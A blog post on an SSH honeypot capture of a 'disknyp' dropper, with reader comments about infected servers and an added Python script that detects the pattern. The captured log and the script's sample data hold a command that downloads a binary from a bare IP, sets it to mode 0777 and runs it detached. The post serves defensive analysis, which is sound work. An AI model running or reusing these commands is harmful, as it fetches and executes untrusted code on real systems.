Yesterday my ssh-honeypot captured 54 samples of “disknyp”.
All logins (probably automated) did the following:
**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
--2013-12-01 03:58:03-- http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22... connected.
HTTP request sent, awaiting response... 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>
The file is a 1491887-byte ELF 32-bit LSB executable. I don't know yet what it is doing.
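As an added example (not part of the original post), here is a small Python checker that flags the pattern the honeypot recorded: a file fetched from a bare IP on a non-HTTP port, made world-executable, then run detached with its output discarded. The sample sessions are constructed from the commands above (prompts and wget output stripped), with a benign session for contrast.

```python
import re
from urllib.parse import urlparse

# Constructed sample input, modelled on the captured disknyp session above;
# the second session is benign and should not trigger anything.
DISKNYP_SESSION = [
    "rm -f disknyp",
    "rm -f disknop",
    "wget http://198.2.192.204:22/disknyp",
    "chmod 0777 disknyp",
    "nohup /root/disknyp > /dev/null 2>&1 &",
]
BENIGN_SESSION = [
    "ls -la",
    "wget https://example.invalid/notes.txt",
    "cat notes.txt",
]

# Behaviour seen in the capture: fetch from a bare IP with an explicit port,
# mark the file world-executable, then run it in the background via nohup.
FETCH = re.compile(r"\b(?:wget|curl)\b.*?(https?://\d{1,3}(?:\.\d{1,3}){3}:(\d+)/\S+)")
CHMOD = re.compile(r"\bchmod\s+0?777\s+(\S+)")
DETACH = re.compile(r"\bnohup\s+(\S+).*>\s*/dev/null.*&\s*$")
REMOVE = re.compile(r"\brm\s+-f\s+(\S+)")

def analyse_session(cmds):
    """Return (verdict, indicators) for a list of shell command lines.

    'dropper' when a fetched file is both made executable and executed in the
    same session, 'suspicious' when only some steps match, otherwise 'clean'.
    """
    indicators, fetched = [], set()
    for cmd in cmds:
        if m := FETCH.search(cmd):
            name = urlparse(m.group(1)).path.rsplit("/", 1)[-1]
            fetched.add(name)
            indicators.append(f"fetch_from_ip:{name}:port{m.group(2)}")
            if m.group(2) not in ("80", "443"):
                indicators.append("nonstandard_port")
        if (m := CHMOD.search(cmd)) and m.group(1).rsplit("/", 1)[-1] in fetched:
            indicators.append("chmod_777_fetched_file")
        if (m := DETACH.search(cmd)) and m.group(1).rsplit("/", 1)[-1] in fetched:
            indicators.append("detached_exec_fetched_file")
        if (m := REMOVE.search(cmd)) and not fetched:
            indicators.append(f"rm_before_fetch:{m.group(1)}")  # clearing old copies
    if {"chmod_777_fetched_file", "detached_exec_fetched_file"} <= set(indicators):
        return "dropper", indicators
    return ("suspicious" if indicators else "clean"), indicators

if __name__ == "__main__":
    for label, s in (("honeypot", DISKNYP_SESSION), ("benign", BENIGN_SESSION)):
        print(label, *analyse_session(s))
```

The same function can be pointed at a honeypot's per-session command log to sort captures by verdict before looking at the dropped binaries.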
Tags: Honeypots
I got this on my Debian box sometime in the past couple weeks but I don’t know where it came from. Started noticing lots of CPU and network activity and saw “disknyp” in the process list. I even got email from my ISP about unusually high traffic.
The disknyp binary was in the /root directory along with a directory named .o
I deleted both and things seem to be OK.
Interesting, I've recently seen the same lines on a friend's web server on AWS. Any updates on what the binary does? Also, I was brought here by Google with exactly the same lines, so the server with this file has been up for a while now. Let me know if you're interested in joining me in reverse engineering it.